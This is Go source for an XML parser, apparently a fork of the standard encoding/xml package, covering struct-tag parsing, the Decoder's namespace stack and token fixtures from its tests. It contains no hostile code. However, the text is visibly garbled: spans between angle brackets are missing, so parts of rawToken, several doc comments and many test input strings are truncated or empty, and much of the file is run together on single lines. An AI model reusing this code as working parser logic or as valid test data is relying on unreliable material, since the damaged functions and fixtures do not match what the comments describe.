				return nil, err
			}

			// XMLName is recorded separately and never added to fields.
			if field.Name == xmlName {
				built.xmlname = info
				continue
			}

			// Add the field unless it conflicts with one already present.
			if err := addFieldInfo(typ, built, info); err != nil {
				return nil, err
			}
		}
	}

	stored, _ := tinfoMap.LoadOrStore(typ, built)
	return stored.(*typeInfo), nil
}

// structFieldInfo builds and returns a fieldInfo for f.
// The xml tag is read as an optional namespace terminated by the first
// space, then a name (optionally a ">"-separated chain of parent elements),
// then comma-separated flag words. Flag words that are not listed in the
// switch below are ignored rather than rejected, so a misspelled flag
// leaves the field in whatever mode the remaining flags select.
func structFieldInfo(typ reflect.Type, f *reflect.StructField) (*fieldInfo, error) {
	rawTag := f.Tag.Get("xml")
	info := &fieldInfo{idx: f.Index}

	// Split the namespace off the front of the tag when one is present.
	spec := rawTag
	if space, rest, hasSpace := strings.Cut(rawTag, " "); hasSpace {
		info.xmlns = space
		spec = rest
	}

	// The first comma-separated part is the name; the rest are flags.
	parts := strings.Split(spec, ",")
	if len(parts) == 1 {
		info.flags = fElement
	} else {
		spec = parts[0]
		for _, word := range parts[1:] {
			switch word {
			case "attr":
				info.flags |= fAttr
			case "cdata":
				info.flags |= fCDATA
			case "chardata":
				info.flags |= fCharData
			case "innerxml":
				info.flags |= fInnerXML
			case "comment":
				info.flags |= fComment
			case "any":
				info.flags |= fAny
			case "omitempty":
				info.flags |= fOmitEmpty
			}
		}

		// Check that the flags form a permitted combination.
		mode := info.flags & fMode
		valid := true
		switch mode {
		case 0:
			// No mode flag given: the field is an element.
			info.flags |= fElement
		case fAttr, fCDATA, fCharData, fInnerXML, fComment, fAny, fAny | fAttr:
			// XMLName may not carry a mode flag, and only plain attr
			// fields may combine a mode flag with an explicit name.
			valid = f.Name != xmlName && (spec == "" || mode == fAttr)
		default:
			// Any other mix, including two modes on one field.
			valid = false
		}
		if mode == fAny {
			info.flags |= fElement
		}
		if info.flags&fOmitEmpty != 0 && info.flags&(fElement|fAttr) == 0 {
			valid = false
		}
		if !valid {
			return nil, fmt.Errorf("xml: invalid tag in field %s of type %s: %q",
				f.Name, typ, rawTag)
		}
	}

	// A namespace must always be accompanied by a name.
	if info.xmlns != "" && spec == "" {
		return nil, fmt.Errorf("xml: namespace without name in field %s of type %s: %q",
			f.Name, typ, rawTag)
	}

	if f.Name == xmlName {
		// XMLName records the element name itself, so an absent name
		// stays empty instead of defaulting to the field name.
		info.name = spec
		return info, nil
	}

	if spec == "" {
		// No name in the tag: prefer the XMLName of the field's own type,
		// and fall back to the Go field name.
		if fromType := lookupXMLName(f.Type); fromType != nil {
			info.xmlns, info.name = fromType.xmlns, fromType.name
		} else {
			info.name = f.Name
		}
		return info, nil
	}

	// Break an "a>b>c" path into parents and the final name.
	path := strings.Split(spec, ">")
	if path[0] == "" {
		path[0] = f.Name
	}
	last := len(path) - 1
	if path[last] == "" {
		return nil, fmt.Errorf("xml: trailing '>' in field %s of type %s", f.Name, typ)
	}
	info.name = path[last]
	if last > 0 {
		if (info.flags & fElement) == 0 {
			return nil, fmt.Errorf("xml: %s chain not valid with %s flag", spec, strings.Join(parts[1:], ","))
		}
		info.parents = path[:last]
	}

	// An element field whose type declares an XMLName must use the same
	// name, so that marshaling and unmarshaling agree.
	if info.flags&fElement != 0 {
		ftyp := f.Type
		if fromType := lookupXMLName(ftyp); fromType != nil && fromType.name != info.name {
			return nil, fmt.Errorf("xml: name %q in tag of %s.%s conflicts with name %q in %s.XMLName",
				info.name, typ, f.Name, fromType.name, ftyp)
		}
	}
	return info, nil
}

// lookupXMLName returns the fieldInfo for typ's XMLName field
// in case it exists and has a valid xml field tag, otherwise
// it returns nil.
//
// Pointers are followed down to the element type first. Only the first
// field named XMLName is examined.
func lookupXMLName(typ reflect.Type) (xmlname *fieldInfo) {
	for typ.Kind() == reflect.Pointer {
		typ = typ.Elem()
	}
	if typ.Kind() != reflect.Struct {
		return nil
	}
	for i := 0; i < typ.NumField(); i++ {
		field := typ.Field(i)
		if field.Name == xmlName {
			info, err := structFieldInfo(typ, &field)
			// A tag error is treated like a missing tag here;
			// getTypeInfo reports the error itself.
			if err != nil || info.name == "" {
				return nil
			}
			return info
		}
	}
	return nil
}

// addFieldInfo adds finfo to tinfo.fields if there are no
// conflicts, or if conflicts arise from previous fields that were
// obtained from deeper embedded structures than finfo. In the latter
// case, the conflicting entries are dropped.
// A conflict occurs when the path (parent + name) to a field is // itself a prefix of another path, or when two paths match exactly. // It is okay for field paths to share a common, shorter prefix. func addFieldInfo(typ reflect.Type, tinfo *typeInfo, newf *fieldInfo) error { var conflicts []int Loop: // First, figure all conflicts. Most working code will have none. for i := range tinfo.fields { oldf := &tinfo.fields[i] if oldf.flags&fMode != newf.flags&fMode { continue } if oldf.xmlns != "" && newf.xmlns != "" && oldf.xmlns != newf.xmlns { continue } minl := min(len(newf.parents), len(oldf.parents)) for p := 0; p < minl; p++ { if oldf.parents[p] != newf.parents[p] { continue Loop } } if len(oldf.parents) > len(newf.parents) { if oldf.parents[len(newf.parents)] == newf.name { conflicts = append(conflicts, i) } } else if len(oldf.parents) < len(newf.parents) { if newf.parents[len(oldf.parents)] == oldf.name { conflicts = append(conflicts, i) } } else { if newf.name == oldf.name && newf.xmlns == oldf.xmlns { conflicts = append(conflicts, i) } } } // Without conflicts, add the new field and return. if conflicts == nil { tinfo.fields = append(tinfo.fields, *newf) return nil } // If any conflict is shallower, ignore the new field. // This matches the Go field resolution on embedding. for _, i := range conflicts { if len(tinfo.fields[i].idx) < len(newf.idx) { return nil } } // Otherwise, if any of them is at the same depth level, it's an error. for _, i := range conflicts { oldf := &tinfo.fields[i] if len(oldf.idx) == len(newf.idx) { f1 := typ.FieldByIndex(oldf.idx) f2 := typ.FieldByIndex(newf.idx) return &TagPathError{typ, f1.Name, f1.Tag.Get("xml"), f2.Name, f2.Tag.Get("xml")} } } // Otherwise, the new field is shallower, and thus takes precedence, // so drop the conflicting fields from tinfo and append the new one. 
for c := len(conflicts) - 1; c >= 0; c-- { i := conflicts[c] copy(tinfo.fields[i:], tinfo.fields[i+1:]) tinfo.fields = tinfo.fields[:len(tinfo.fields)-1] } tinfo.fields = append(tinfo.fields, *newf) return nil } // A TagPathError represents an error in the unmarshaling process // caused by the use of field tags with conflicting paths. type TagPathError struct { Struct reflect.Type Field1, Tag1 string Field2, Tag2 string } func (e *TagPathError) Error() string { return fmt.Sprintf("%s field %q with tag %q conflicts with field %q with tag %q", e.Struct, e.Field1, e.Tag1, e.Field2, e.Tag2) } const ( initNilPointers = true dontInitNilPointers = false ) // value returns v's field value corresponding to finfo. // It's equivalent to v.FieldByIndex(finfo.idx), but when passed // initNilPointers, it initializes and dereferences pointers as necessary. // When passed dontInitNilPointers and a nil pointer is reached, the function // returns a zero reflect.Value. func (finfo *fieldInfo) value(v reflect.Value, shouldInitNilPointers bool) reflect.Value { for i, x := range finfo.idx { if i > 0 { t := v.Type() if t.Kind() == reflect.Pointer && t.Elem().Kind() == reflect.Struct { if v.IsNil() { if !shouldInitNilPointers { return reflect.Value{} } v.Set(reflect.New(v.Type().Elem())) } v = v.Elem() } } v = v.Field(x) } return v } ================================================ FILE: internal/thirdparty/xml/xml.go ================================================ // Copyright 2009 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package xml implements a simple XML 1.0 parser that // understands XML name spaces. // // Marshalling self-closing tags are not supported in Go. // https://github.com/golang/go/issues/21399 // With the current implementation, self-closing tags are expanded // to both StartElement and EndElement. 
// We would like to have our own implementation of decoder so that // self-closing tags are read and written with minimum diff. package xml // References: // Annotated XML spec: https://www.xml.com/axml/testaxml.htm // XML name spaces: https://www.w3.org/TR/REC-xml-names/ import ( "bufio" "bytes" "errors" "fmt" "io" "strconv" "strings" "unicode" "unicode/utf8" ) // A SyntaxError represents a syntax error in the XML input stream. type SyntaxError struct { Msg string Line int } func (e *SyntaxError) Error() string { return "XML syntax error on line " + strconv.Itoa(e.Line) + ": " + e.Msg } // A Name represents an XML name (Local) annotated // with a name space identifier (Space). // In tokens returned by [Decoder.Token], the Space identifier // is given as a canonical URL, not the short prefix used // in the document being parsed. type Name struct { Space, Local string } // An Attr represents an attribute in an XML element (Name=Value). type Attr struct { Name Name Value string Diff string // Diff whitespace between two attributes } // A Token is an interface holding one of the token types: // [StartElement], [EndElement], [CharData], [Comment], [ProcInst], or [Directive]. type Token any // A StartElement represents an XML start element. type StartElement struct { Name Name Attr []Attr Empty bool // Whether this is an empty element Diff string // Any extra space for empty element } // Copy creates a new copy of StartElement. func (e StartElement) Copy() StartElement { attrs := make([]Attr, len(e.Attr)) copy(attrs, e.Attr) e.Attr = attrs return e } // End returns the corresponding XML end element. func (e StartElement) End() EndElement { return EndElement{e.Name, e.Empty} } // An EndElement represents an XML end element. type EndElement struct { Name Name Empty bool } // A CharData represents XML character data (raw text). // XML escape sequences are replaced by the characters they represent in data. 
// origin holds the original text that escape sequences are not changed. // cdata indicates whether text 'CDATA' is in the raw text. type CharData struct { data []byte origin []byte cdata bool } // Copy creates a new copy of CharData. func (c CharData) Copy() CharData { return CharData{bytes.Clone(c.data), bytes.Clone(c.origin), c.cdata} } // A Comment represents an XML comment of the form . // The bytes do not include the comment markers. type Comment []byte // Copy creates a new copy of Comment. func (c Comment) Copy() Comment { return Comment(bytes.Clone(c)) } // A ProcInst represents an XML processing instruction of the form type ProcInst struct { Target string Inst []byte } // Copy creates a new copy of ProcInst. func (p ProcInst) Copy() ProcInst { p.Inst = bytes.Clone(p.Inst) return p } // A Directive represents an XML directive of the form . // The bytes do not include the markers. type Directive []byte // Copy creates a new copy of Directive. func (d Directive) Copy() Directive { return Directive(bytes.Clone(d)) } // CopyToken returns a copy of a Token. func CopyToken(t Token) Token { switch v := t.(type) { case CharData: return v.Copy() case Comment: return v.Copy() case Directive: return v.Copy() case ProcInst: return v.Copy() case StartElement: return v.Copy() } return t } // A TokenReader is anything that can decode a stream of XML tokens, including a // [Decoder]. // // When Token encounters an error or end-of-file condition after successfully // reading a token, it returns the token. It may return the (non-nil) error from // the same call or return the error (and a nil token) from a subsequent call. // An instance of this general case is that a TokenReader returning a non-nil // token at the end of the token stream may return either io.EOF or a nil error. // The next Read should return nil, [io.EOF]. // // Implementations of Token are discouraged from returning a nil token with a // nil error. 
Callers should treat a return of nil, nil as indicating that // nothing happened; in particular it does not indicate EOF. type TokenReader interface { Token() (Token, error) } // A Decoder represents an XML parser reading a particular input stream. // The parser assumes that its input is encoded in UTF-8. type Decoder struct { // Strict defaults to true, enforcing the requirements // of the XML specification. // If set to false, the parser allows input containing common // mistakes: // * If an element is missing an end tag, the parser invents // end tags as necessary to keep the return values from Token // properly balanced. // * In attribute values and character data, unknown or malformed // character entities (sequences beginning with &) are left alone. // // Setting: // // d.Strict = false // d.AutoClose = xml.HTMLAutoClose // d.Entity = xml.HTMLEntity // // creates a parser that can handle typical HTML. // // Strict mode does not enforce the requirements of the XML name spaces TR. // In particular it does not reject name space tags using undefined prefixes. // Such tags are recorded with the unknown prefix as the name space URL. Strict bool // When Strict == false, AutoClose indicates a set of elements to // consider closed immediately after they are opened, regardless // of whether an end element is present. AutoClose []string // Entity can be used to map non-standard entity names to string replacements. // The parser behaves as if these standard mappings are present in the map, // regardless of the actual map content: // // "lt": "<", // "gt": ">", // "amp": "&", // "apos": "'", // "quot": `"`, Entity map[string]string // CharsetReader, if non-nil, defines a function to generate // charset-conversion readers, converting from the provided // non-UTF-8 charset into UTF-8. If CharsetReader is nil or // returns an error, parsing stops with an error. One of the // CharsetReader's result values must be non-nil. 
CharsetReader func(charset string, input io.Reader) (io.Reader, error) // DefaultSpace sets the default name space used for unadorned tags, // as if the entire XML stream were wrapped in an element containing // the attribute xmlns="DefaultSpace". DefaultSpace string r io.ByteReader t TokenReader buf bytes.Buffer saved *bytes.Buffer stk *stack free *stack needClose bool toClose Name nextToken Token nextByte int ns map[string]string err error line int linestart int64 offset int64 unmarshalDepth int } // NewDecoder creates a new XML parser reading from r. // If r does not implement [io.ByteReader], NewDecoder will // do its own buffering. func NewDecoder(r io.Reader) *Decoder { d := &Decoder{ ns: make(map[string]string), nextByte: -1, line: 1, Strict: true, } d.switchToReader(r) return d } // NewTokenDecoder creates a new XML parser using an underlying token stream. func NewTokenDecoder(t TokenReader) *Decoder { // Is it already a Decoder? if d, ok := t.(*Decoder); ok { return d } d := &Decoder{ ns: make(map[string]string), t: t, nextByte: -1, line: 1, Strict: true, } return d } // Token returns the next XML token in the input stream. // At the end of the input stream, Token returns nil, [io.EOF]. // // Slices of bytes in the returned token data refer to the // parser's internal buffer and remain valid only until the next // call to Token. To acquire a copy of the bytes, call [CopyToken] // or the token's Copy method. // // Token expands self-closing elements such as
// into separate start and end elements returned by successive calls.
//
// The [StartElement] and [EndElement] tokens that Token returns are
// guaranteed to be properly nested and matched: an unexpected end
// element, or EOF while end elements are still outstanding, makes
// Token return an error.
//
// An error returned by [Decoder.CharsetReader] is wrapped and returned.
//
// Token implements XML name spaces as described by
// https://www.w3.org/TR/REC-xml-names/. Every [Name] in the returned
// token has its Space set to the URL identifying its name space when
// that is known. An unrecognized name space prefix is not reported as
// an error: the prefix itself is stored in Space, so a caller that
// needs declared name spaces only has to check for that case itself.
func (d *Decoder) Token() (Token, error) {
	// An EOF marker on top of the stack means the current
	// sub-document is finished.
	if d.stk != nil && d.stk.kind == stkEOF {
		return nil, io.EOF
	}

	var tok Token
	if pending := d.nextToken; pending != nil {
		// A token held back by an earlier autoClose comes first.
		tok = pending
		d.nextToken = nil
	} else {
		raw, rawErr := d.rawToken()
		if raw == nil && rawErr != nil {
			// EOF while elements are still open is a syntax error.
			if rawErr == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
				rawErr = d.syntaxError("unexpected EOF")
			}
			return nil, rawErr
		}
		// A token that arrives together with an error (e.g. EOF) is
		// still processed; the error is dropped.
		tok = raw
	}

	if !d.Strict {
		// Lenient mode: hand out an invented end tag first and keep
		// the real token for the next call.
		if invented, ok := d.autoClose(tok); ok {
			d.nextToken = tok
			tok = invented
		}
	}

	switch elem := tok.(type) {
	case StartElement:
		// In XML name spaces, the translations listed in the
		// attributes apply to the element name and to the other
		// attribute names, so they are recorded before anything
		// is translated.
		for _, attr := range elem.Attr {
			switch {
			case attr.Name.Space == xmlnsPrefix:
				// xmlns:prefix="url"
				prev, had := d.ns[attr.Name.Local]
				d.pushNs(attr.Name.Local, prev, had)
				d.ns[attr.Name.Local] = attr.Value
			case attr.Name.Space == "" && attr.Name.Local == xmlnsPrefix:
				// xmlns="url": default space for untagged names
				prev, had := d.ns[""]
				d.pushNs("", prev, had)
				d.ns[""] = attr.Value
			}
		}
		d.pushElement(elem.Name)
		d.translate(&elem.Name, true)
		for i := range elem.Attr {
			d.translate(&elem.Attr[i].Name, false)
		}
		tok = elem
	case EndElement:
		if !d.popElement(&elem) {
			return nil, d.err
		}
		tok = elem
	}
	return tok, nil
}

const (
	xmlURL      = "http://www.w3.org/XML/1998/namespace"
	xmlnsPrefix = "xmlns"
	xmlPrefix   = "xml"
)

// translate applies name space translation to name n in place.
// The default name space (for Space=="")
// applies only to element names, not to attribute names.
//
// Names in the xmlns space, unprefixed attribute names and an element
// literally named xmlns are left untouched. The xml prefix is mapped
// to xmlURL first. A prefix with no entry in d.ns stays as it is,
// which is how an undeclared prefix ends up in Name.Space.
func (d *Decoder) translate(n *Name, isElementName bool) {
	if n.Space == xmlnsPrefix {
		return
	}
	if n.Space == "" && !isElementName {
		return
	}
	if n.Space == xmlPrefix {
		n.Space = xmlURL
	} else if n.Space == "" && n.Local == xmlnsPrefix {
		return
	}

	mapped, known := d.ns[n.Space]
	switch {
	case known:
		n.Space = mapped
	case n.Space == "":
		n.Space = d.DefaultSpace
	}
}

// switchToReader makes r the decoder's byte source.
//
// A reader that has its own ReadByte is assumed to be efficient
// enough and is used directly; anything else is wrapped in a
// bufio.Reader.
func (d *Decoder) switchToReader(r io.Reader) {
	byteSource, ok := r.(io.ByteReader)
	if !ok {
		byteSource = bufio.NewReader(r)
	}
	d.r = byteSource
}

// Parsing state - stack holds old name space translations
// and the current set of open elements. The translations to pop when
// ending a given tag are *below* it on the stack, which is
// more work but forced on us by XML.
type stack struct {
	next *stack // entry below this one (or next free entry on the free list)
	kind int    // stkStart, stkNs or stkEOF
	name Name   // stkStart: element name; stkNs: Local is the prefix, Space the previous URL
	ok   bool   // stkNs only: whether the prefix had a previous translation
}

const (
	stkStart = iota // an open element
	stkNs           // an undo record for a name space translation
	stkEOF          // marker at which Token reports io.EOF
)

// push puts a new entry of the given kind on top of the stack and
// returns it. Entries are taken from the free list when one is
// available; a recycled entry keeps its old name and ok values until
// the caller overwrites them.
func (d *Decoder) push(kind int) *stack {
	entry := d.free
	if entry == nil {
		entry = new(stack)
	} else {
		d.free = entry.next
	}
	entry.kind = kind
	entry.next = d.stk
	d.stk = entry
	return entry
}

// pop removes the top entry, moves it onto the free list and returns
// it. It returns nil when the stack is empty.
func (d *Decoder) pop() *stack {
	top := d.stk
	if top == nil {
		return nil
	}
	d.stk = top.next
	top.next = d.free
	d.free = top
	return top
}

// Record that after the current element is finished
// (that element is already pushed on the stack)
// Token should return EOF until popEOF is called.
//
// NOTE(review): the search below dereferences each entry without a
// nil check, so it relies on a stkStart entry being on the stack as
// the comment above requires - confirm every caller guarantees that.
func (d *Decoder) pushEOF() {
	// Walk down the stack to the innermost Start. It need not be
	// the top entry, because stkNs entries may sit above it.
	elem := d.stk
	for elem.kind != stkStart {
		elem = elem.next
	}
	// The stkNs entries directly below a Start belong to that
	// element as well, so the marker goes underneath them.
	for elem.next != nil && elem.next.kind == stkNs {
		elem = elem.next
	}

	marker := d.free
	if marker == nil {
		marker = new(stack)
	} else {
		d.free = marker.next
	}
	marker.kind = stkEOF
	marker.next = elem.next
	elem.next = marker
}

// Undo a pushEOF.
// The element must have been finished, so the EOF should be at the top of the stack.
// popEOF reports whether an EOF marker was on top and has been removed.
func (d *Decoder) popEOF() bool {
	if d.stk != nil && d.stk.kind == stkEOF {
		d.pop()
		return true
	}
	return false
}

// Record that we are starting an element with the given name.
func (d *Decoder) pushElement(name Name) {
	d.push(stkStart).name = name
}

// Record that we are changing the value of ns[local].
// The old value is url, ok.
func (d *Decoder) pushNs(local string, url string, ok bool) {
	undo := d.push(stkNs)
	undo.ok = ok
	undo.name.Space = url
	undo.name.Local = local
}

// Creates a SyntaxError with the current line number.
func (d *Decoder) syntaxError(msg string) error {
	return &SyntaxError{Line: d.line, Msg: msg}
}

// Record that we are ending an element with the given name.
// The name must match the record at the top of the stack,
// which must be a pushElement record.
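// After popping the element, apply any undo records from
// the stack to restore the name translations that existed
// before we saw this element.
//
// popElement returns false and sets d.err to a SyntaxError when the
// top of the stack is not an open element, or when the end tag does
// not match that element's local name or name space. Each message
// names the offending end tag, so a rejected document can be
// diagnosed from the error alone.
//
// When Strict is false, an end tag whose local name does not match is
// tolerated: t is rewritten to close the open element, and the end tag
// actually read is kept in d.toClose with d.needClose set so that
// rawToken returns it next. That path returns before any name space
// undo record is applied.
func (d *Decoder) popElement(t *EndElement) bool {
	s := d.pop()
	name := t.Name
	switch {
	case s == nil || s.kind != stkStart:
		d.err = d.syntaxError("unexpected end element </" + name.Local + ">")
		return false
	case s.name.Local != name.Local:
		if !d.Strict {
			d.needClose = true
			d.toClose = t.Name
			t.Name = s.name
			return true
		}
		d.err = d.syntaxError("element <" + s.name.Local + "> closed by </" + name.Local + ">")
		return false
	case s.name.Space != name.Space:
		// Show an empty name space as "" so it stays visible in the message.
		ns := name.Space
		if name.Space == "" {
			ns = `""`
		}
		d.err = d.syntaxError("element <" + s.name.Local + "> in space " + s.name.Space +
			" closed by </" + name.Local + "> in space " + ns)
		return false
	}

	d.translate(&t.Name, true)

	// Pop stack until a Start or EOF is on the top, undoing the
	// translations that were associated with the element we just closed.
	for d.stk != nil && d.stk.kind != stkStart && d.stk.kind != stkEOF {
		s := d.pop()
		if s.ok {
			d.ns[s.name.Local] = s.name.Space
		} else {
			delete(d.ns, s.name.Local)
		}
	}

	return true
}

// If the top element on the stack is autoclosing and
// t is not the end tag, invent the end tag.
//
// Element names are compared with AutoClose case-insensitively.
// The second result reports whether an end tag was invented. Token
// calls autoClose only when Strict is false.
func (d *Decoder) autoClose(t Token) (Token, bool) {
	if d.stk == nil || d.stk.kind != stkStart {
		return nil, false
	}
	for _, s := range d.AutoClose {
		if strings.EqualFold(s, d.stk.name.Local) {
			// This one should be auto closed if t doesn't close it.
			// When t is not an EndElement, et is the zero value, so
			// the invented tag carries Empty == false.
			et, ok := t.(EndElement)
			if !ok || !strings.EqualFold(et.Name.Local, d.stk.name.Local) {
				return EndElement{d.stk.name, et.Empty}, true
			}
			break
		}
	}
	return nil, false
}

// errRawToken is returned by RawToken while d.unmarshalDepth is above zero.
var errRawToken = errors.New("xml: cannot use RawToken from UnmarshalXML method")

// RawToken is like [Decoder.Token] but does not verify that
// start and end elements match and does not translate
// name space prefixes to their corresponding URLs.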
func (d *Decoder) RawToken() (Token, error) { if d.unmarshalDepth > 0 { return nil, errRawToken } return d.rawToken() } func (d *Decoder) rawToken() (Token, error) { if d.t != nil { return d.t.Token() } if d.err != nil { return nil, d.err } if d.needClose { // The last element we read was self-closing and // we returned just the StartElement half. // Return the EndElement half now. d.needClose = false return EndElement{d.toClose, true}, nil } b, ok := d.getc() if !ok { return nil, d.err } if b != '<' { // Text section. d.ungetc(b) data, origin := d.text(-1, false) if data == nil { return nil, d.err } return CharData{data: data, origin: origin}, nil } if b, ok = d.mustgetc(); !ok { return nil, d.err } switch b { case '/': // ' { d.err = d.syntaxError("invalid characters between ") return nil, d.err } return EndElement{name, false}, nil case '?': // ' { break } b0 = b } data := d.buf.Bytes() data = data[0 : len(data)-2] // chop ?> if target == "xml" { content := string(data) ver := procInst("version", content) if ver != "" && ver != "1.0" { d.err = fmt.Errorf("xml: unsupported version %q; only version 1.0 is supported", ver) return nil, d.err } enc := procInst("encoding", content) if enc != "" && enc != "utf-8" && enc != "UTF-8" && !strings.EqualFold(enc, "utf-8") { if d.CharsetReader == nil { d.err = fmt.Errorf("xml: encoding %q declared but Decoder.CharsetReader is nil", enc) return nil, d.err } newr, err := d.CharsetReader(enc, d.r.(io.Reader)) if err != nil { d.err = fmt.Errorf("xml: opening charset %q: %w", enc, err) return nil, d.err } if newr == nil { panic("CharsetReader returned a nil Reader for charset " + enc) } d.switchToReader(newr) } } return ProcInst{target, data}, nil case '!': // ' { d.err = d.syntaxError( `invalid sequence "--" not allowed in comments`) return nil, d.err } break } b0, b1 = b1, b } data := d.buf.Bytes() data = data[0 : len(data)-3] // chop --> return Comment(data), nil case '[': // . 
data, origin := d.text(-1, true) if data == nil { return nil, d.err } return CharData{data: data, origin: origin, cdata: true}, nil } // Probably a directive: , , etc. // We don't care, but accumulate for caller. Quoted angle // brackets do not count for nesting. d.buf.Reset() d.buf.WriteByte(b) inquote := uint8(0) depth := 0 for { if b, ok = d.mustgetc(); !ok { return nil, d.err } if inquote == 0 && b == '>' && depth == 0 { break } HandleB: d.buf.WriteByte(b) switch { case b == inquote: inquote = 0 case inquote != 0: // in quotes, no special action case b == '\'' || b == '"': inquote = b case b == '>' && inquote == 0: depth-- case b == '<' && inquote == 0: // Look for ` var testEntity = map[string]string{"何": "What", "is-it": "is it?"} var rawTokens = []Token{ CharData{data: []byte("\n")}, ProcInst{"xml", []byte(`version="1.0" encoding="UTF-8"`)}, CharData{data: []byte("\n")}, Directive(`DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"`), CharData{data: []byte("\n")}, StartElement{Name{"", "body"}, []Attr{{Name{"xmlns", "foo"}, "ns1", ""}, {Name{"", "xmlns"}, "ns2", ""}, {Name{"xmlns", "tag"}, "ns3", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"", "hello"}, []Attr{{Name{"", "lang"}, "en", ""}}, false, ""}, CharData{data: []byte("World <>'\" 白鵬翔"), origin: []byte("World <>'" 白鵬翔")}, EndElement{Name{"", "hello"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"", "query"}, []Attr{}, false, ""}, CharData{data: []byte("What is it?"), origin: []byte("&何; &is-it;")}, EndElement{Name{"", "query"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"", "goodbye"}, []Attr{}, true, " "}, EndElement{Name{"", "goodbye"}, true}, CharData{data: []byte("\n ")}, StartElement{Name{"", "outer"}, []Attr{{Name{"foo", "attr"}, "value", ""}, {Name{"xmlns", "tag"}, "ns4", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"", "inner"}, []Attr{}, true, ""}, 
EndElement{Name{"", "inner"}, true}, CharData{data: []byte("\n ")}, EndElement{Name{"", "outer"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"tag", "name"}, []Attr{}, false, ""}, CharData{data: []byte("\n ")}, CharData{data: []byte("Some text here."), cdata: true}, CharData{data: []byte("\n ")}, EndElement{Name{"tag", "name"}, false}, CharData{data: []byte("\n")}, EndElement{Name{"", "body"}, false}, Comment(" missing final newline "), } var cookedTokens = []Token{ CharData{data: []byte("\n")}, ProcInst{"xml", []byte(`version="1.0" encoding="UTF-8"`)}, CharData{data: []byte("\n")}, Directive(`DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"`), CharData{data: []byte("\n")}, StartElement{Name{"ns2", "body"}, []Attr{{Name{"xmlns", "foo"}, "ns1", ""}, {Name{"", "xmlns"}, "ns2", ""}, {Name{"xmlns", "tag"}, "ns3", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "hello"}, []Attr{{Name{"", "lang"}, "en", ""}}, false, ""}, CharData{data: []byte("World <>'\" 白鵬翔"), origin: []byte("World <>'" 白鵬翔")}, EndElement{Name{"ns2", "hello"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "query"}, []Attr{}, false, ""}, CharData{data: []byte("What is it?"), origin: []byte("&何; &is-it;")}, EndElement{Name{"ns2", "query"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "goodbye"}, []Attr{}, true, " "}, EndElement{Name{"ns2", "goodbye"}, true}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "outer"}, []Attr{{Name{"ns1", "attr"}, "value", ""}, {Name{"xmlns", "tag"}, "ns4", ""}}, false, ""}, CharData{data: []byte("\n ")}, StartElement{Name{"ns2", "inner"}, []Attr{}, true, ""}, EndElement{Name{"ns2", "inner"}, true}, CharData{data: []byte("\n ")}, EndElement{Name{"ns2", "outer"}, false}, CharData{data: []byte("\n ")}, StartElement{Name{"ns3", "name"}, []Attr{}, false, ""}, CharData{data: []byte("\n ")}, CharData{data: []byte("Some text 
here."), cdata: true}, CharData{data: []byte("\n ")}, EndElement{Name{"ns3", "name"}, false}, CharData{data: []byte("\n")}, EndElement{Name{"ns2", "body"}, false}, Comment(" missing final newline "), } const testInputAltEncoding = ` VALUE` var rawTokensAltEncoding = []Token{ CharData{data: []byte("\n")}, ProcInst{"xml", []byte(`version="1.0" encoding="x-testing-uppercase"`)}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("value")}, EndElement{Name{"", "tag"}, false}, } var xmlInput = []string{ // unexpected EOF cases "<", "", "", "", // "", // let the Token() caller handle "", "", "", "", " c;", "", "", "", // "", // let the Token() caller handle "", "", "cdata]]>", } func TestRawToken(t *testing.T) { d := NewDecoder(strings.NewReader(testInput)) d.Entity = testEntity testRawToken(t, d, testInput, rawTokens) } const nonStrictInput = ` non&entity &unknown;entity { &#zzz; &なまえ3; <-gt; &; &0a; ` var nonStrictTokens = []Token{ CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("non&entity")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&unknown;entity")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("{")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&#zzz;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("&なまえ3;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, CharData{data: []byte("<-gt;")}, EndElement{Name{"", "tag"}, false}, CharData{data: []byte("\n")}, StartElement{Name{"", "tag"}, []Attr{}, false, ""}, 
